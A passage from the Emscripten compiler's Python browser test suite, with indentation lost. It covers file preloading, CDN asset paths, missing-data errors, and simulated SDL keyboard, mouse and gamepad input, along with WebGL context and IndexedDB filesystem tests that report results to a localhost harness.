open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//out('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//out('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
